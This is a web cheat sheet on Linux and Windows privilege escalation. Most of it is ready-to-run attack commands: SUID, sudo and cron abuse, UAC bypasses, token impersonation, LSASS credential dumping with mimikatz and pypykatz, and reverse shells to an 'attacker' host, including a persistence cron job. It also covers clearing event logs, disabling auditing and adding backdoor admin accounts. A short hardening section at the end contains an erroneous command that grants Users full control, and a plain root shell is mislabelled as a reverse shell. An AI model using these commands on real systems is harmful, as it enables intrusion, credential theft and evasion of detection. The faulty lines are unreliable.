Skip to content
1337skills 1337skills

Privilege Escalation

Privilege escalation encompasses techniques to gain higher privileges (typically root/SYSTEM) on Linux and Windows systems. This guide covers enumeration tools, common vulnerabilities, and exploitation patterns.

Quick Reference

OSEnumeration ToolPrimary Vectors
LinuxLinPEAS, LinEnum, pspySUID binaries, cron jobs, sudo, kernel exploits, capabilities
WindowswinPEAS, Seatbelt, PowerUpUnquoted service paths, weak permissions, UAC bypass, LSASS dump, token impersonation

Linux Privilege Escalation

Enumeration Commands

# Basic user information
id
whoami
groups
sudo -l

# Interesting files and permissions
find / -perm -4000 -type f 2>/dev/null  # SUID binaries
find / -perm -2000 -type f 2>/dev/null  # SGID binaries
find / -perm -0002 -type d 2>/dev/null  # World-writable directories

# Kernel version and potential vulnerabilities
uname -a
cat /proc/version

# Check for interesting capabilities
getcap -r / 2>/dev/null

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/

# Installed software
dpkg -l | grep -i "gcc\|cc\|make"
rpm -qa | grep -i "kernel-devel"

# Network and processes
netstat -tulpn
ss -tulpn
ps auxf

Common Linux Privilege Escalation Vectors

SUID Binary Exploitation

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Check GTFOBins for exploitation techniques
# https://gtfobins.github.io/

# Example: Exploitable tar with SUID
tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

Sudo Without Password

# Check what can be run with sudo
sudo -l

# Example: Running script with sudo
sudo /path/to/script.sh

# Reverse shell via sudo
sudo /bin/bash

Writable Cron Jobs

# Identify cron jobs
crontab -l
cat /etc/cron.d/*

# Check if script is writable
ls -la /path/to/cron/script.sh

# Modify if writable
echo "bash -i >& /dev/tcp/attacker/4444 0>&1" >> script.sh

Kernel Exploits

# Identify kernel version
uname -r

# Search for exploits
searchsploit "Linux Kernel 5.10"

# Compile and execute
gcc exploit.c -o exploit
./exploit

Capabilities Abuse

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Example: cap_setuid on perl
perl -e 'use POSIX qw(setuid); setuid(0); exec "/bin/sh"'

# Example: cap_net_admin
ping -c1 127.0.0.1  # If cap_net_admin set

Environment Variable Exploitation

# Check LD_PRELOAD or LD_LIBRARY_PATH
echo $LD_PRELOAD
echo $LD_LIBRARY_PATH

# Create malicious shared library
# Compile and inject via LD_PRELOAD

Linux Privilege Escalation Tools

# LinPEAS - Comprehensive enumeration
./linpeas.sh

# LinEnum - Detailed enumeration
./LinEnum.sh

# Linux Exploit Suggester - CVE matching
./linux-exploit-suggester.sh

# pspy - Monitor processes in real-time
./pspy64 -pf -i 1000

# GTFOBins - Database of exploitation techniques
# https://gtfobins.github.io/

Windows Privilege Escalation

Enumeration Commands

# User and group information
whoami
net user %username%
net group "Administrators"
whoami /priv

# Check for UAC status
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

# Service enumeration
Get-Service | Where-Object {$_.Status -eq "Running"}
wmic service list brief
Get-WmiObject win32_service -Property Name,PathName,StartMode | Where-Object {$_.StartMode -eq "Auto"}

# Check for unquoted service paths
wmic service get name,pathname | findstr /i /v "C:\Program Files\" | findstr /i /v """

# Process and network information
Get-Process
Get-NetTCPConnection -State Listen
netstat -ano

# Scheduled tasks
tasklist /v
schtasks /query /fo LIST /v

# Registry for credentials
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

# Check group policy
gpresult /H report.html

# Installed software
Get-ChildItem 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall' |
  ForEach-Object { Get-ItemProperty $_.PSPath } |
  Select-Object DisplayName, Publisher, Version

Common Windows Privilege Escalation Vectors

Unquoted Service Path Exploitation

# Find vulnerable services
Get-WmiObject win32_service -Property Name,PathName |
  Where-Object {$_.PathName -notlike '"*'} |
  ForEach-Object {
    Write-Host $_.Name $_.PathName
  }

# Check directory permissions
icacls "C:\Program Files\Vulnerable App"

# Place payload at priority location
# If path is: C:\Program Files\Vulnerable App\service.exe
# Place payload at: C:\Program.exe

# Restart service to execute payload
Restart-Service "VulnerableService" -Force

Weak Service Permissions

# Check service DACL
Get-Acl "HKLM:\System\CurrentControlSet\Services\ServiceName"

# If writable, modify ImagePath
reg add "HKLM\SYSTEM\CurrentControlSet\Services\ServiceName" /v ImagePath /d "C:\payload.exe" /f

# Restart service
Restart-Service "ServiceName"

Always Install Elevated

# Check if vulnerable
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Create malicious MSI
# Use msfvenom or custom MSI creation

# Install with elevated privileges
msiexec /i payload.msi /qb /log output.txt

UAC Bypass Techniques

# Fodhelper bypass (Windows 10/11)
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\payload.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
C:\Windows\System32\fodhelper.exe

# EventViewer bypass
reg add HKCU\Software\Classes\mscfile\shell\open\command /d "C:\payload.exe" /f
C:\Windows\System32\wevtutil.exe qe Security /c:1 /rd:true /f:text

# Disk Cleanup bypass
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLowDiskSpaceChecks /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSaveSettings /d 1 /f
C:\Windows\System32\cleanmgr.exe

Token Impersonation (Rotten/Juicy Potato)

# Check for impersonation privileges
whoami /priv | find "SeImpersonate"

# Use JuicyPotato exploit
JuicyPotato.exe -l 1337 -p C:\payload.exe

# Verify SYSTEM access
whoami

LSASS Credential Dumping

# Using pypykatz
python -m pypykatz live lsa

# Using Nanodump (stealthy)
nanodump.exe --write output.dmp --fork

# Using Mimikatz
mimikatz.exe sekurlsa::logonpasswords

# Extract from minidump
pypykatz lsa minidump output.dmp

Windows Privilege Escalation Tools

# PowerUp - PowerShell-based enumeration
Invoke-AllChecks

# Seatbelt - .NET-based enumeration
Seatbelt.exe -group=all

# winPEAS - Comprehensive enumeration
winPEAS.exe -systeminfo

# Rubeus - Kerberos exploitation
Rubeus.exe kerberoast

# SharpUp - C# version of PowerUp
SharpUp.exe

General Privilege Escalation Principles

Information Gathering Checklist

[ ] Current user privileges and group memberships
[ ] SUID/SGID binaries (Linux) or service permissions (Windows)
[ ] Cron jobs (Linux) or scheduled tasks (Windows)
[ ] Weak file permissions on configuration files
[ ] Installed software versions (check for known CVEs)
[ ] Kernel version and available exploits
[ ] Network services running as root/SYSTEM
[ ] Mounted filesystems and NFS shares (no_root_squash)
[ ] Environment variables for credentials
[ ] Writable directories in system paths

Exploitation Workflow

1. ENUMERATE
   ├── Run automated tools (LinPEAS, winPEAS, etc.)
   ├── Check for low-hanging fruit (sudo -l, uname -a)
   └── Document findings in priority order

2. PRIORITIZE
   ├── Critical: Immediate exploitation possible
   ├── High: Requires minimal conditions
   ├── Medium: Needs specific configuration
   └── Low: Complex or low-probability

3. VERIFY
   ├── Confirm vulnerability exists
   ├── Test exploit in safe environment
   └── Document exploitation requirements

4. EXPLOIT
   ├── Execute exploit with proper parameters
   ├── Monitor for errors or alerts
   └── Verify successful privilege escalation

5. COVER TRACKS
   ├── Clear logs if possible
   ├── Remove exploit artifacts
   └── Establish persistence if needed

Privilege Escalation Detection Evasion

Linux Evasion

# Run LinPEAS without creating process artifacts
bash <(curl -s https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh)

# Use in-memory execution
python3 -c "exec(open('/path/to/script.py').read())"

# Obfuscate command execution
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1  # Reverse shell without nc

# Clear bash history
history -c && history -w
rm ~/.bash_history

Windows Evasion

# Execute PowerShell without leaving history
powershell -NoProfile -ExecutionPolicy Bypass -Command "Invoke-AllChecks"

# Clear PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath

# Disable audit logging temporarily
reg add HKLM\System\CurrentControlSet\Control\Lsa /v auditbaseobjects /d 0 /f

# Clear event logs
wevtutil.exe cl System
wevtutil.exe cl Security
wevtutil.exe cl Application

# Use legitimate tools (living off the land)
# Use WMI, WMIC, or built-in PowerShell instead of custom tools

Post-Exploitation Privilege Escalation

Credential Dumping (Windows)

# Dump NTLM hashes
pypykatz live lsa

# Dump Kerberos tickets
Rubeus.exe dump /service:krbtgt

# Dump from registry hives
reg save HKLM\SAM C:\sam
reg save HKLM\SYSTEM C:\system
pypykatz registry -r C:\sam C:\system

# DPAPI vault decryption
pypykatz dpapi vault -password "UserPassword"

Credential Dumping (Linux)

# Dump password hashes
cat /etc/shadow  # If readable

# Check for cached credentials
grep -r "password" /home/*/.*config* 2>/dev/null

# Extract keys from SSH
cat /root/.ssh/id_rsa  # If readable

# Check environment variables for secrets
env | grep -i "pass\|key\|secret"

Persistence Mechanisms

# Linux - Add cron job for reverse shell
(crontab -l; echo "*/5 * * * * /bin/bash -i >& /dev/tcp/attacker/4444 0>&1") | crontab -

# Linux - Add SSH key to authorized_keys
echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys

# Windows - Add scheduled task
schtasks /create /tn "WindowsUpdate" /tr "C:\payload.exe" /sc daily /st 00:00

# Windows - Create new admin user
net user attacker P@ssw0rd123 /add
net localgroup Administrators attacker /add

Troubleshooting Common Issues

Exploit Not Working

# Verify exploit is for correct OS/version
uname -a  # Linux
systeminfo  # Windows

# Check exploit requirements
# - Specific kernel version
# - Specific installed software
# - Specific privileges required

# Recompile for target architecture
gcc -m32 exploit.c -o exploit  # For 32-bit target
gcc exploit.c -o exploit  # For 64-bit target (default)

# Check for dependencies
ldd ./exploit  # List required libraries

Permission Denied on Exploit Execution

# Make file executable
chmod +x exploit

# Check for DEP/ASLR
cat /proc/sys/kernel/randomize_va_space  # If 0, ASLR disabled

# Windows - Check UAC
whoami /priv | findstr "Admin"

# Run from writable directory
cp exploit /tmp/exploit && /tmp/exploit

Exploit Segfaults

# Compile with debug symbols
gcc -g exploit.c -o exploit

# Run with gdb
gdb ./exploit

# Check for buffer size differences
# Verify architecture matches
file exploit

Real-World Privilege Escalation Scenarios

Scenario 1: SUID Binary Exploitation

# 1. Find SUID binaries
find / -perm -4000 -type f 2>/dev/null | head -20

# 2. Identify exploitable binary
# Check if binary is in GTFOBins

# 3. Example: exploitable cp with SUID
# If /usr/bin/cp has SUID, can overwrite files as root
/usr/bin/cp /etc/shadow /tmp/shadow.bak
/usr/bin/cp /tmp/malicious_shadow /etc/shadow

# 4. Verify privilege escalation
id

Scenario 2: Unquoted Service Path (Windows)

# 1. Find vulnerable service
Get-WmiObject win32_service -Property Name,PathName |
  Where-Object {$_.PathName -notlike '"*' -and $_.PathName -like '*Program Files*'}

# 2. Check permissions on vulnerable directory
icacls "C:\Program Files\Vulnerable"

# 3. Place payload
# Service path: C:\Program Files\Vulnerable App\service.exe
# Payload location: C:\Program.exe

# 4. Restart service
Restart-Service "VulnerableService" -Force

# 5. Verify
whoami
# Should show SYSTEM

Scenario 3: Kernel Exploit (Linux)

# 1. Identify kernel version
uname -r  # e.g., 5.10.0-13

# 2. Search for exploit
./linux-exploit-suggester.sh -k 5.10.0

# 3. Download and compile
gcc exploit.c -o exploit

# 4. Execute
./exploit

# 5. Verify privilege escalation
id  # uid=0(root)

Scenario 4: Sudo Misconfiguration

# 1. Check sudo permissions
sudo -l

# 2. Example: Apache can run any command
# apache ALL=(ALL) NOPASSWD: ALL

# 3. Exploit
sudo /bin/bash
id

Privilege Escalation Checklist (Linux)

INITIAL ENUMERATION
[ ] whoami / id / groups
[ ] sudo -l (check for NOPASSWD entries)
[ ] uname -a (kernel version)
[ ] find / -perm -4000 -type f 2>/dev/null (SUID binaries)
[ ] find / -perm -2000 -type f 2>/dev/null (SGID binaries)
[ ] cat /etc/crontab (system cron jobs)
[ ] crontab -l (user cron jobs)
[ ] find / -perm -0002 -type d 2>/dev/null (world-writable directories)

SOFTWARE VULNERABILITIES
[ ] Check for known CVEs: ./linux-exploit-suggester.sh
[ ] Search Exploit-DB: searchsploit
[ ] Compile potential exploits
[ ] Test in isolated environment

MISCONFIGURATIONS
[ ] Check file permissions on sensitive files
[ ] Review /etc/sudoers for wildcards
[ ] Check writable scripts in system paths
[ ] Review capabilities: getcap -r / 2>/dev/null
[ ] Check LD_PRELOAD usage

PERSISTENCE (post-exploitation)
[ ] Create backup access
[ ] Install persistence mechanism
[ ] Document escalation method

Privilege Escalation Checklist (Windows)

INITIAL ENUMERATION
[ ] whoami / whoami /priv
[ ] net user %username%
[ ] net localgroup Administrators
[ ] systeminfo (check for CVEs)
[ ] Get-WmiObject win32_service (check services)
[ ] reg query for AlwaysInstallElevated
[ ] schtasks /query (scheduled tasks)

VULNERABILITY ASSESSMENT
[ ] Run WES: python wes.py systeminfo.txt
[ ] Run PowerUp: Invoke-AllChecks
[ ] Run Seatbelt: Seatbelt.exe -group=all
[ ] Check Windows Updates: Get-HotFix

SERVICE EXPLOITATION
[ ] Find unquoted paths: wmic service get name,pathname
[ ] Check weak permissions: Get-Acl "HKLM:\SYSTEM\..."
[ ] Identify exploitable services

UAC BYPASS
[ ] Check UAC status
[ ] Test UAC bypass techniques (Fodhelper, EventViewer, etc.)
[ ] Verify admin context achieved

CREDENTIAL DUMPING
[ ] Dump LSASS: pypykatz live lsa
[ ] Extract from registry hives
[ ] Dump Kerberos tickets

PERSISTENCE (post-exploitation)
[ ] Create new admin user
[ ] Install scheduled task
[ ] Configure RDP access

Linux Enumeration

  • LinPEAS: Comprehensive automated enumeration
  • LinEnum: Detailed system reconnaissance
  • linux-exploit-suggester: CVE matching tool
  • pspy: Real-time process monitoring
  • GTFOBins: SUID/binary exploitation database

Windows Enumeration

  • winPEAS: Comprehensive Windows enumeration
  • Seatbelt: .NET-based quick assessment
  • PowerUp: PowerShell privilege escalation checks
  • windows-exploit-suggester: Windows CVE matching

Credential Extraction

  • Mimikatz: Original credential extraction tool
  • pypykatz: Pure Python Mimikatz implementation
  • nanodump: Stealthy LSASS dumping
  • Rubeus: Kerberos-focused extraction

Exploitation Frameworks

  • Metasploit: Full exploitation framework
  • Searchsploit: Offline Exploit-DB access
  • Social Engineer Toolkit: SE-based exploitation

Post-Exploitation

  • Empire: PowerShell-based post-exploitation
  • Covenant: C# post-exploitation framework
  • Sliver: Golang-based C2 framework

Privilege Escalation Prevention (Defensive)

Linux Hardening

# Disable SUID on suspicious binaries
chmod u-s /path/to/binary

# Restrict sudo access
visudo  # Edit /etc/sudoers carefully

# Remove unnecessary kernel modules
rmmod nfs  # If not needed

# Apply principle of least privilege
chmod 640 /etc/shadow

# Keep system updated
apt-get update && apt-get upgrade

# Implement AppArmor or SELinux
aa-enforce /etc/apparmor.d/*

Windows Hardening

# Enable UAC
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /d 2

# Implement LSA protection
reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa /v RunAsPPL /d 1

# Enable Windows Defender Credential Guard
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa" /v LsaCfgFlags /d 1

# Restrict service permissions
icacls "C:\Program Files\Service" /grant:r "Users":(F)  # Avoid World permissions

# Apply principle of least privilege in services
# Run services with minimum necessary privileges

# Keep system updated
Windows Update

Reference

  • OWASP: Privilege escalation techniques and prevention
  • MITRE ATT&CK: T1548.004 (Elevated Execution with Prompt), T1134 (Access Token Manipulation)
  • HackerOne: Real-world privilege escalation examples
  • Exploit-DB: Public exploit code repository
  • NVD: National Vulnerability Database for CVE information

Last updated: March 2026 | GitHub Privilege Escalation Research